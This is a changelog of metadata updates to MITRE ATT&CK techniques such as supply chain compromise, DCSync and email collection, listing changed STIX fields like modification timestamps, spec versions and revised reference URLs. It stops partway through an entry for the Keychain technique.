[T1195.002] Supply Chain Compromise: Compromise Software Supply Chain
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-28 16:04:36.636000+00:00 | 2025-04-15 22:08:31.739000+00:00 |
| external_references[2]['description'] | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved April 6, 2018. | Command Five Pty Ltd. (2011, September). SK Hack by an Advanced Persistent Threat. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.commandfive.com/papers/C5_APT_SKHack.pdf | https://web.archive.org/web/20160309235002/https://www.commandfive.com/papers/C5_APT_SKHack.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1496.001] Resource Hijacking: Compute Hijacking
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-13 16:58:38.820000+00:00 | 2025-04-15 22:08:46.014000+00:00 |
[T1556.009] Modify Authentication Process: Conditional Access Policies
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-16 16:54:47.595000+00:00 | 2025-04-15 22:09:03.621000+00:00 |
[T1213.001] Data from Information Repositories: Confluence
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-30 13:45:42.840000+00:00 | 2025-04-15 22:09:18.055000+00:00 |
[T1552.007] Unsecured Credentials: Container API
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:25:28.820000+00:00 | 2025-04-15 22:09:34.621000+00:00 |
[T1543.005] Create or Modify System Process: Container Service
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:35:38.832000+00:00 | 2025-04-15 22:10:00.252000+00:00 |
[T1613] Container and Resource Discovery
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-15 16:08:50.706000+00:00 | 2025-04-15 22:10:13.179000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1659] Content Injection
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-01 02:28:45.147000+00:00 | 2025-04-15 22:10:29.343000+00:00 |
[T1578.002] Modify Cloud Compute Infrastructure: Create Cloud Instance
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-30 13:28:37.416000+00:00 | 2025-04-15 22:10:54.239000+00:00 |
| external_references[3]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1578.001] Modify Cloud Compute Infrastructure: Create Snapshot
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:53:44.870000+00:00 | 2025-04-15 22:11:14.755000+00:00 |
| external_references[4]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1543] Create or Modify System Process
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-15 14:14:03.942000+00:00 | 2025-04-15 22:11:29.155000+00:00 |
| external_references[3]['description'] | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved July 10, 2017. | Patrick Wardle. (2016, February 29). Let's Play Doctor: Practical OS X Malware Detection & Analysis. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf | https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf |
[T1589.001] Gather Victim Identity Information: Credentials
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-10 13:45:01.069000+00:00 | 2025-04-15 22:11:53.342000+00:00 |
| external_references[3]['description'] | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ | https://labs.detectify.com/writeups/slack-bot-token-leakage-exposing-business-critical-information/ |
[T1555] Credentials from Password Stores
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 14:57:46.850000+00:00 | 2025-04-15 22:12:11.343000+00:00 |
[T1555.003] Credentials from Password Stores: Credentials from Web Browsers
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-15 14:13:45.294000+00:00 | 2025-04-15 22:12:28.087000+00:00 |
[T1213.004] Data from Information Repositories: Customer Relationship Management Software
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 14:36:24.983000+00:00 | 2025-04-15 22:12:49.744000+00:00 |
[T1003.006] OS Credential Dumping: DCSync
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:54:08.312000+00:00 | 2025-04-15 22:13:04.812000+00:00 |
| external_references[12]['description'] | Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017. | Wine API. (n.d.). samlib.dll. Retrieved November 17, 2024. |
| external_references[12]['url'] | https://source.winehq.org/WineAPI/samlib.html | https://strontic.github.io/xcyclopedia/library/samlib.dll-0BDF6351009F6EBA5BA7E886F23263B1.html |
[T1557.003] Adversary-in-the-Middle: DHCP Spoofing
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:46:04.759000+00:00 | 2025-04-15 22:13:20.292000+00:00 |
[T1590.002] Gather Victim Network Information: DNS
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-11-11 16:13:02.196000+00:00 | 2025-04-15 22:13:37.080000+00:00 |
[T1583.002] Acquire Infrastructure: DNS Server
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 02:49:49.702000+00:00 | 2025-04-15 22:14:14.654000+00:00 |
[T1584.002] Compromise Infrastructure: DNS Server
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 21:22:13.578000+00:00 | 2025-04-15 22:13:56.342000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1596.001] Search Open Technical Databases: DNS/Passive DNS
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:49:13.409000+00:00 | 2025-04-15 22:14:34.882000+00:00 |
[T1565] Data Manipulation
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-02 17:18:39.004000+00:00 | 2025-04-15 22:14:59.144000+00:00 |
[T1530] Data from Cloud Storage
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:15:26.889000+00:00 |
[T1213] Data from Information Repositories
Current version: 3.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-28 19:10:16.960000+00:00 | 2025-04-15 22:15:46.213000+00:00 |
[T1578.003] Modify Cloud Compute Infrastructure: Delete Cloud Instance
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-30 13:28:37.415000+00:00 | 2025-04-15 22:16:21.146000+00:00 |
| external_references[3]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. |
[T1591.001] Gather Victim Org Information: Determine Physical Locations
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-27 15:37:09.025000+00:00 | 2025-04-15 22:16:44.365000+00:00 |
| external_references[2]['description'] | U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021. | U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.sec.gov/edgar/search-and-access | https://www.sec.gov/edgar/search/ |
[T1587] Develop Capabilities
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:31:17.270000+00:00 | 2025-04-15 22:17:05.876000+00:00 |
[T1652] Device Driver Discovery
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-05-04 18:07:16.804000+00:00 | 2025-04-15 22:17:22.391000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1098.005] Account Manipulation: Device Registration
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:39:53.597000+00:00 | 2025-04-15 22:17:39.860000+00:00 |
[T1588.004] Obtain Capabilities: Digital Certificates
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-16 16:19:41.567000+00:00 | 2025-04-15 22:18:17.702000+00:00 |
[T1587.003] Develop Capabilities: Digital Certificates
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 17:32:34.604000+00:00 | 2025-04-15 22:18:36.653000+00:00 |
[T1596.003] Search Open Technical Databases: Digital Certificates
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:48:37.628000+00:00 | 2025-04-15 22:18:01.430000+00:00 |
[T1021.008] Remote Services: Direct Cloud VM Connections
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-27 18:32:11.219000+00:00 | 2025-04-15 22:18:53.305000+00:00 |
[T1498.001] Network Denial of Service: Direct Network Flood
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:54:49.943000+00:00 | 2025-04-15 22:19:07.343000+00:00 |
[T1562.007] Impair Defenses: Disable or Modify Cloud Firewall
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-16 19:38:57.374000+00:00 | 2025-04-15 22:19:38.109000+00:00 |
[T1562.008] Impair Defenses: Disable or Modify Cloud Logs
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:19:53.826000+00:00 |
[T1562.012] Impair Defenses: Disable or Modify Linux Audit System
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-03 03:44:46.935000+00:00 | 2025-04-15 22:20:10.121000+00:00 |
[T1021.003] Remote Services: Distributed Component Object Model
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-11 20:21:55.610000+00:00 | 2025-04-15 22:20:51.024000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1087.002] Account Discovery: Domain Account
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-05-31 04:00:37.651000+00:00 | 2025-04-15 22:21:07.252000+00:00 |
[T1136.002] Create Account: Domain Account
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-01 04:37:36.774000+00:00 | 2025-04-15 22:21:24.212000+00:00 |
[T1556.001] Modify Authentication Process: Domain Controller Authentication
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-21 15:26:54.386000+00:00 | 2025-04-15 22:21:45.658000+00:00 |
[T1069.002] Permission Groups Discovery: Domain Groups
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-07 17:16:47.754000+00:00 | 2025-04-15 22:22:08.417000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1590.001] Gather Victim Network Information: Domain Properties
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21 14:32:05.257000+00:00 | 2025-04-15 22:22:22.764000+00:00 |
| external_references[5]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
| external_references[5]['url'] | https://www.whois.net/ | https://who.is/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1482] Domain Trust Discovery
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-06-16 19:18:22.305000+00:00 | 2025-04-15 22:22:35.004000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1583.001] Acquire Infrastructure: Domains
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 15:26:00.047000+00:00 | 2025-04-15 22:23:15.751000+00:00 |
[T1584.001] Compromise Infrastructure: Domains
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-24 15:10:40.270000+00:00 | 2025-04-15 22:22:55.487000+00:00 |
| external_references[2]['description'] | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017. | ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.icann.org/groups/ssac/documents/sac-007-en | https://www.icann.org/en/ssac/registration-services/documents/sac-007-domain-name-hijacking-incidents-threats-risks-and-remediation-12-07-2005-en |
[T1036.007] Masquerading: Double File Extension
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-14 21:09:59.588000+00:00 | 2025-04-15 22:23:40.712000+00:00 |
[T1608.004] Stage Capabilities: Drive-by Target
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-15 00:21:55.791000+00:00 | 2025-04-15 22:24:03.854000+00:00 |
| external_references[3]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://web.archive.org/web/20201024230407/https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1027.007] Obfuscated Files or Information: Dynamic API Resolution
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-08-23 18:32:46.899000+00:00 | 2025-04-15 22:24:25.266000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1218.015] System Binary Proxy Execution: Electron Applications
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-15 23:00:33.493000+00:00 | 2025-04-15 22:24:54.174000+00:00 |
[T1087.003] Account Discovery: Email Account
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 20:35:35.125000+00:00 | 2025-04-15 22:25:10.775000+00:00 |
[T1585.002] Establish Accounts: Email Accounts
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-28 21:11:27.088000+00:00 | 2025-04-15 22:25:33.493000+00:00 |
[T1586.002] Compromise Accounts: Email Accounts
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-11 01:07:48.218000+00:00 | 2025-04-15 22:26:01.830000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1589.002] Gather Victim Identity Information: Email Addresses
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21 14:30:10.979000+00:00 | 2025-04-15 22:26:21.953000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1114] Email Collection
Current version: 2.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 12:24:27.627000+00:00 | 2025-04-15 22:26:37.477000+00:00 |
[T1114.003] Email Collection: Email Forwarding Rule
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:26:55.201000+00:00 |
[T1564.008] Hide Artifacts: Email Hiding Rules
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:56:27.592000+00:00 | 2025-04-15 22:27:09.849000+00:00 |
[T1589.003] Gather Victim Identity Information: Employee Names
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-16 16:09:45.795000+00:00 | 2025-04-15 22:27:33.795000+00:00 |
[T1499] Endpoint Denial of Service
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:56:47.424000+00:00 | 2025-04-15 22:28:03.155000+00:00 |
| external_references[4]['description'] | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019. | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html | https://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html |
[T1585] Establish Accounts
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-28 21:08:56.520000+00:00 | 2025-04-15 22:28:26.144000+00:00 |
[T1546] Event Triggered Execution
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:57:00.731000+00:00 | 2025-04-15 22:28:46.740000+00:00 |
[T1011] Exfiltration Over Other Network Medium
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-11 16:06:10.376000+00:00 | 2025-04-15 22:29:20.961000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1212] Exploitation for Credential Access
Current version: 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:30:06.288000+00:00 |
[T1587.004] Develop Capabilities: Exploits
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:07:53.803000+00:00 | 2025-04-15 22:33:51.026000+00:00 |
[T1588.005] Obtain Capabilities: Exploits
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:14:01.255000+00:00 | 2025-04-15 22:34:05.500000+00:00 |
[T1491.002] Defacement: External Defacement
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-25 19:34:37.539000+00:00 | 2025-04-15 22:34:21.584000+00:00 |
| external_references[1]['description'] | FireEye. (n.d.). Retrieved April 19, 2019. | FireEye. (n.d.). Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf | https://web.archive.org/web/20210719110553/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf |
[T1133] External Remote Services
Current version: 2.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:36.318000+00:00 | 2025-04-15 22:34:58.667000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1564.012] Hide Artifacts: File/Path Exclusions
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-15 23:42:39.831000+00:00 | 2025-04-15 22:35:31.731000+00:00 |
[T1027.011] Obfuscated Files or Information: Fileless Storage
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-04 15:05:25.388000+00:00 | 2025-04-15 22:35:48.121000+00:00 |
[T1657] Financial Theft
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:58:10.254000+00:00 | 2025-04-15 22:36:03.465000+00:00 |
[T1592.003] Gather Victim Host Information: Firmware
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:22:46.759000+00:00 | 2025-04-15 22:36:31.208000+00:00 |
[T1187] Forced Authentication
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:33:34.508000+00:00 | 2025-04-15 22:36:48.417000+00:00 |
| external_references[3]['description'] | Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved December 21, 2017. | Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx | https://web.archive.org/web/20100210125749/https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx |
[T1606] Forge Web Credentials
Current version: 1.5
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:58:23.638000+00:00 | 2025-04-15 22:37:02.111000+00:00 |
[T1056.002] Input Capture: GUI Input Capture
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-15 23:39:31.474000+00:00 | 2025-04-15 22:37:16.582000+00:00 |
[T1592] Gather Victim Host Information
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-03 19:35:07.269000+00:00 | 2025-04-15 22:37:32.347000+00:00 |
[T1589] Gather Victim Identity Information
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-16 16:09:45.794000+00:00 | 2025-04-15 22:37:47.951000+00:00 |
| external_references[2]['description'] | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020. | Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/ | https://labs.detectify.com/writeups/slack-bot-token-leakage-exposing-business-critical-information/ |
[T1590] Gather Victim Network Information
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:34:23.229000+00:00 | 2025-04-15 22:38:13.461000+00:00 |
| external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.whois.net/ | https://who.is/ |
[T1591] Gather Victim Org Information
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-27 15:37:09.343000+00:00 | 2025-04-15 22:38:32.343000+00:00 |
| external_references[2]['description'] | U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021. | U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.sec.gov/edgar/search-and-access | https://www.sec.gov/edgar/search/ |
[T1615] Group Policy Discovery
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-01-06 12:41:08.579000+00:00 | 2025-04-15 22:38:54.812000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T1552.006] Unsecured Credentials: Group Policy Preferences
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-08-15 13:21:22.734000+00:00 | 2025-04-15 22:39:12.196000+00:00 |
[T1592.001] Gather Victim Host Information: Hardware
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-17 16:32:10.810000+00:00 | 2025-04-15 22:39:29.396000+00:00 |
[T1564.002] Hide Artifacts: Hidden Users
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 02:31:01.315000+00:00 | 2025-04-15 22:39:51.186000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T1556.007] Modify Authentication Process: Hybrid Identity
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 22:40:10.913000+00:00 |
[T1590.005] Gather Victim Network Information: IP Addresses
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:31:05.302000+00:00 | 2025-04-15 22:40:30.211000+00:00 |
| external_references[1]['description'] | NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. | NTT America. (n.d.). Whois Lookup. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.whois.net/ | https://who.is/ |
[T1591.003] Gather Victim Org Information: Identify Business Tempo
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:38:31.983000+00:00 | 2025-04-15 22:40:43.647000+00:00 |
[T1591.004] Gather Victim Org Information: Identify Roles
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 03:39:08.904000+00:00 | 2025-04-15 22:40:57.270000+00:00 |
[T1564.011] Hide Artifacts: Ignore Process Interrupts
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-11-06 20:14:51.609000+00:00 | 2025-04-15 22:41:11.807000+00:00 |
[T1656] Impersonation
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:59:06.382000+00:00 | 2025-04-15 22:41:31.140000+00:00 |
[T1608.003] Stage Capabilities: Install Digital Certificate
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 17:47:46.409000+00:00 | 2025-04-15 22:42:10.891000+00:00 |
[T1534] Internal Spearphishing
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:59:36.741000+00:00 | 2025-04-15 22:42:40.610000+00:00 |
[T1036.001] Masquerading: Invalid Code Signature
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-02-10 19:52:47.724000+00:00 | 2025-04-15 22:43:00.641000+00:00 |
[T1059.007] Command and Scripting Interpreter: JavaScript
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-07-30 14:12:52.698000+00:00 | 2025-04-15 22:43:16.394000+00:00 |
[T1574.013] Hijack Execution Flow: KernelCallbackTable
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-03-22 15:47:33.915000+00:00 | 2025-04-15 22:43:44.231000+00:00 |
[T1555.001] Credentials from Password Stores: Keychain
Current version: 1.1
Details
